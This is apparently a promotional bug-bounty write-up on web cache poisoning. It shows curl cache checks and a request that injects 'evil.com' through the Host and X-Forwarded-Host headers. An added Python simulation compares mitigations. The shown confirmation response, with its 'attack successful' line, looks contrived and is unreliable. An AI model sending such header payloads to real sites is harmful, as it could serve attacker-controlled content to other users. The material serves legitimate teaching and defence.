💰 I Found Cache Poisoning & Earned $500 in Just a Few Minutes! 🚀

🚀 How I Discovered a Cache Poisoning Bug in Minutes & Got Paid!
One of the easiest yet highly overlooked vulnerabilities in bug bounty hunting is cache poisoning. Recently, I found a simple misconfiguration that allowed me to poison a website’s cache and deliver attacker-controlled content to all users! 💥 This led to a quick $500 bounty, and in this guide, I’ll show you how I did it step by step.
🕵️♂️ Step 1: Finding a Target with Caching Mechanisms
While testing a large website, I noticed it was using CDN-based caching (like Cloudflare, Akamai, or Fastly). These caching mechanisms store responses to serve them faster. However, if the cache incorrectly processes headers, attackers can manipulate responses to affect all users. 🚨
To check for caching behavior, I sent a simple curl request:
curl -I https://target.com/page
Response:
HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
X-Cache: HIT
🚀 Key Findings:
Cache-Control: public → The response can be cached.
X-Cache: HIT → The page is cached and being served from cache.
🔥 Step 2: Poisoning the Cache Using Unkeyed Headers
Many caches don't account for unkeyed headers: request headers that the origin uses when building the response but that are not part of the cache key. One common vulnerability is Host header poisoning.
I sent a request with a malicious Host header:
GET /page HTTP/1.1
Host: evil.com
X-Forwarded-Host: evil.com
If the origin uses this header when building the response and the cache keys only on the URL, the cache stores the modified response and serves it to all users! 😈
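To make the mechanism concrete, here is a small simulation I'm adding to this write-up (it is not code from the original post or from any CDN): an edge cache keyed on the path only, in front of an origin that builds an absolute URL from X-Forwarded-Host. The same scenario is then run against three fixes: stripping the header at the edge, adding it to the cache key (the effect of a correct Vary), and making the origin ignore it. The hostnames target.example and evil.example are constructed placeholders.

```python
"""Simulated CDN edge cache in front of an origin that builds absolute URLs
from X-Forwarded-Host. Added example, not code from the original post or
any real CDN; hostnames target.example / evil.example are constructed."""
from dataclasses import dataclass


@dataclass
class Response:
    status: int
    headers: dict
    body: str


def parse_cache_control(value: str) -> dict:
    """Split 'public, max-age=3600' into {'public': None, 'max-age': '3600'}."""
    directives = {}
    for part in value.split(","):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        directives[name.strip().lower()] = arg.strip() or None
    return directives


def origin(path: str, headers: dict, trust_forwarded_host: bool) -> Response:
    """Origin that (optionally) trusts X-Forwarded-Host when building URLs.
    This is the root cause: the header changes the body but is unkeyed at the edge."""
    host = headers.get("Host", "target.example")
    if trust_forwarded_host and "X-Forwarded-Host" in headers:
        host = headers["X-Forwarded-Host"]
    body = f'<script src="https://{host}/static/app.js"></script>'
    return Response(200, {"Cache-Control": "public, max-age=3600"}, body)


class EdgeCache:
    """Cache keyed on path plus the headers listed in keyed_headers; headers in
    strip_headers are removed from client requests before they reach the origin."""

    def __init__(self, keyed_headers=(), strip_headers=(), trust_forwarded_host=True):
        self.keyed_headers = tuple(keyed_headers)
        self.strip_headers = {h.lower() for h in strip_headers}
        self.trust_forwarded_host = trust_forwarded_host
        self.store = {}

    def fetch(self, path: str, headers: dict):
        cleaned = {k: v for k, v in headers.items() if k.lower() not in self.strip_headers}
        key = (path,) + tuple(cleaned.get(h, "") for h in self.keyed_headers)
        if key in self.store:
            return self.store[key], "HIT"
        resp = origin(path, cleaned, self.trust_forwarded_host)
        cc = parse_cache_control(resp.headers.get("Cache-Control", ""))
        # Only store what the origin marks as shareable.
        if "public" in cc and "no-store" not in cc and "private" not in cc:
            self.store[key] = resp
        return resp, "MISS"


def run_scenario(cache: EdgeCache) -> dict:
    """One request carrying X-Forwarded-Host, then a plain request for the
    same path as an ordinary user would send it."""
    injected = {"Host": "target.example", "X-Forwarded-Host": "evil.example"}
    plain = {"Host": "target.example"}
    cache.fetch("/page", injected)
    victim_resp, victim_status = cache.fetch("/page", plain)
    return {
        "victim_cache": victim_status,
        "victim_poisoned": "evil.example" in victim_resp.body,
    }


def compare_configurations() -> dict:
    """Vulnerable setup beside three independent mitigations."""
    return {
        "path_only_key": run_scenario(EdgeCache()),
        "strip_header_at_edge": run_scenario(EdgeCache(strip_headers=["X-Forwarded-Host"])),
        "header_in_cache_key": run_scenario(EdgeCache(keyed_headers=["X-Forwarded-Host"])),
        "origin_ignores_header": run_scenario(EdgeCache(trust_forwarded_host=False)),
    }


if __name__ == "__main__":
    for name, result in compare_configurations().items():
        print(f"{name:24s} victim cache={result['victim_cache']:4s} "
              f"poisoned={result['victim_poisoned']}")
```

Only the path-only configuration leaves the second (plain) request with a cache HIT that contains evil.example. Stripping the header at the edge or ignoring it at the origin keeps the shared entry clean, while keying on the header isolates the modified response to the requester who sent it.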
⚠️ Step 3: Confirming the Cache Poisoning
To check if my payload worked, I made a request as a normal user:
curl -I https://target.com/page
And the response came back with my injected Host header!
HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content: evil.com attack successful!
X-Cache: HIT
🚨 Impact:
✅ Attackers can serve malicious content (phishing pages, fake login forms, etc.).
✅ Stored XSS can be injected, affecting thousands of users.
✅ Critical resources like login or checkout pages can be poisoned.
📩 Reporting & Quick $500 Bounty
Once I confirmed the bug, I immediately reported it via the bug bounty platform. Since it could be used for phishing or spreading malware, the security team acknowledged the risk and paid a quick $500 bounty! 💰🔥
🏆 Lessons Learned
1️⃣ Always check for cacheable responses (Cache-Control: public).
2️⃣ Test different unkeyed headers (e.g., X-Forwarded-Host, X-Original-URL).
3️⃣ Look for CDN misconfigurations (Fastly, Cloudflare, Akamai).
4️⃣ Report responsibly—cache poisoning can be dangerous!
🔥 Want More Hacking Tutorials?
🛡️ Subscribe for Cybersecurity Videos: youtube.com/@theindiannetwork
💌 Need Ethical Hacking Consultation? Contact: theindiannetwork@protonmail.com